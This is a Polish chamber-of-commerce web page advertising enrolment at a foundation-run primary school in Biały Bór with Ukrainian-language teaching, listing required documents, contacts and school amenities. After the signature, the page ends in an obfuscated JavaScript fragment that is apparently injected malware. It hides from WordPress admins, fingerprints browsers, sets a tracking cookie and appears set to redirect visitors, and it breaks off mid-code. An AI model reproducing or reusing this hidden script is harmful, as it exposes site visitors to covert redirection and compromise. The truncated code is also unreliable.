Oferta szkoły podstawowej dla dzieci pracowników z Ukrainy | Północna Izba Gospodarcza w Koszalinie

T. Przedsiębiorstwa

zrzeszone w Północnej Izbie Gospodarczej

Fundacja Rozwoju Demokracji, Edukacji, Kultury i Aktywizacji DEKA organizuje po raz kolejny nabór do szkoły podstawowej nr 2 im. Tarasa Szewczenki w Białym Borze. Fundacja od dnia 1 września 2016 roku jest organem zarządzającym szkołą podstawową. W chwili obecnej jest już kilkadziesiąt zgłoszeń do szkoły. Ale rekrutacja trwa nadal. Zachęcamy rodziców, dziadków i opiekunów prawnych dzieci do kontaktu z przedstawicielami szkoły, aby mogli zapoznać się z ofertą szkolną dla dzieci i młodzieży, którzy chcieliby podjąć naukę. Można osobiście lub telefonicznie dowiedzieć się o ofercie edukacyjnej.

Szkoła adresuje swoją ofertę również do dzieci pracowników z Ukrainy, którzy pracują w Polsce w Państwa firmie lub firmach kooperantach. Dla uczniów z Ukrainy zapewniamy zajęcia w języku ukraińskim, ale także dodatkowe lekcje języka polskiego aby mogli szybko zaaklimatyzować się w Polsce.

Szkoła jest bezpłatna!! Ponadto dla uczniów zapewniamy internat wraz z całodobowym wyżywieniem w bardzo niskiej cenach.

Osoby zainteresowane nauką prosimy o kontakt pod nr tel. 94-37-39-026, 94-36-70-162, tel. 511-533-505 lub poprzez pocztę e-mail: zs2bb@op.pl

Na stronie internetowej www.liceum-bialybor.eu do pobrania są dokumenty dla nowych uczniów:

 1. Warunki przyjmowania uczniów do Szkoły Podstawowej
 2. Podanie do szkoły – dwujęzyczne
 3. Podanie o miejsce w internacie
 4. Wniosek rodzica o objęcie dziecka / ucznia nauką języka mniejszości narodowej w Szkole Podstawowej.

Wymagane dokumenty:

 • podanie o przyjęcie do szkoły   (załącznik nr 1)
 • podanie do internatu ( załącznik nr 2)
 • numer PESEL ucznia
 • 3 fotografie ( podpisane imieniem i nazwiskiem oraz datą urodzenia)
 • kserokopię karty zdrowia
 • skrócony odpis aktu urodzenia
 • kopia deklaracji wyboru lekarza podstawowej opieki zdrowotnej

 

Niewątpliwą zaletą nauki w szkołach jest fakt, że uczniowie uczą się w małych klasach, gdzie nauczyciel może poświęcić więcej uwagi uczniowi, rozwinąć jego talenty, pomóc w nauce.

Szkoła oferuje ciekawy program kształcenia, zaadresowany nie tylko dla uczniów pochodzenia ukraińskiego, ale dla tych wszystkich którzy nie znają języka ukraińskiego, a chcieliby poznać, język, kulturę i dziedzictwo wschodniego sąsiada. Nauka przedmiotów szkolnych prowadzona jest w języku polskim i nie jest wymagana znajomość języka ukraińskiego. Wiedzę i znajomość języka ukraińskiego uczniowie nabywają podczas zajęć szkolonych.

Ważnym elementem profilu szkoły jest nastawienie na naukę języków obcych, nie tylko języka ukraińskiego, ale dodatkowo angielskiego oraz niemieckiego.

Do szkoły mogą uczęszczać dzieci z terenu całej Polski, bowiem placówka posiada internat dla uczniów zamiejscowych i statut szkoły bezobwodowej.  Nasza Szkoła wprowadza uczniów w świat wiedzy naukowej. Grono pedagogiczne to osoby wykwalifikowane, pełne zapału i chęci do najlepszego wykształcenia uczniów. Nauczyciele uczą dzieci samodzielności i pomagają w podejmowaniu decyzji dotyczącej kierunku dalszej edukacji. Szkoła stara się w sposób ciekawy i interesujący organizować czas wolny uczniom szkoły. Uzdolnieni uczniowie mogą zawsze liczyć na fachową pomoc swoich nauczycieli, która wspiera młodzież w jej rozwoju oraz umacnia w niej poczucie własnej wartości. W zależności od zainteresowań młodzieży prowadzone są różnorodne zajęcia pozalekcyjne.

Uczniowie poza standardowym trybem nauki mogę korzystać z bezpłatnych dodatkowych zajęć.

Dodatkowymi atutami, które wyróżniają szkołę na tle innych szkół w regionie i Polsce jest m.in.:

 • wysoki poziom nauczania,
 • możliwość zamieszkania w komfortowych warunkach w internacie,
 • korzystania z centrum multimedialnego
 • opiekę wysokokwalifikowanej kadry nauczycieli i wychowawców
 • możliwość korzystania z  obiektów sportowych typu „Orlik” i Sali gimnastycznej znajdującej się w internacie,
 • możliwość wszechstronnego rozwoju zainteresowań i uzdolnień w różnorodnych zespołach: teatralnych, recytatorskich, tanecznych, muzycznych, sportowych, a także w organizacji „Płast” ,
 • opiekę pedagogiczną od 7.00 do 16.00
 • wyżywienie (drugie śniadanie i obiad)
 • pracownie wyposażone w nowoczesne pomoce dydaktyczne (komputery, tablice interaktywne, sprzęt sportowy itp.)
 • naukę czterech języków: polskiego, ukraińskiego, angielskiego i niemieckiego na różnych poziomach zaawansowania
 • możliwość rozwoju na bezpłatnych zajęciach pozalekcyjnych (zespół taneczny, chór szkolny, koła zainteresowań, lekcje gry na pianinie)
 • liczne imprezy kulturalne, rozrywkowe i sportowe
 • darmowe wyjazdy do kina, teatru i do aquaparku
 • dofinansowanie do wycieczek szkolnych w wysokości 50-70% kosztów
 • stypendia naukowe i socjalne – w tym celu powołany specjalny Fundusz Stypendialny
 • pokrycie kosztów dojazdu do szkoły
 • zakwaterowanie w internacie
 • bezpieczeństwo i przyjazną atmosferę
 • naukę w małych grupach
 • indywidualne podejście do ucznia
 • klasy do 10 uczniów,
 • indywidualne podejście do ucznia,
 • bezpieczne i czyste środowisko naturalne,

Fundacja DEKA powołała specjalny Fundusz Stypendialny dla uczniów którzy osiągają bardzo dobre wyniki w nauce, posiadają ponadprzeciętną wiedzę i zdolności ale częstokroć nie posiadają środków finansowych na kontynuację nauki. Pomocą zostaną objęci uczniowie szkół z ukraińskim językiem nauczania w Białym Borze.

Do pobrania- Oferta szkoły podstawowej dla dzieci pracowników z Ukrainy

                                                             

                                                                      / – / Roman Biłas

                                                                      Prezes Zarządu
                                                                    Fundacji Rozwoju Demokracji,
                                                                   Edukacji, Kultury i Aktywizacji DEKA

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m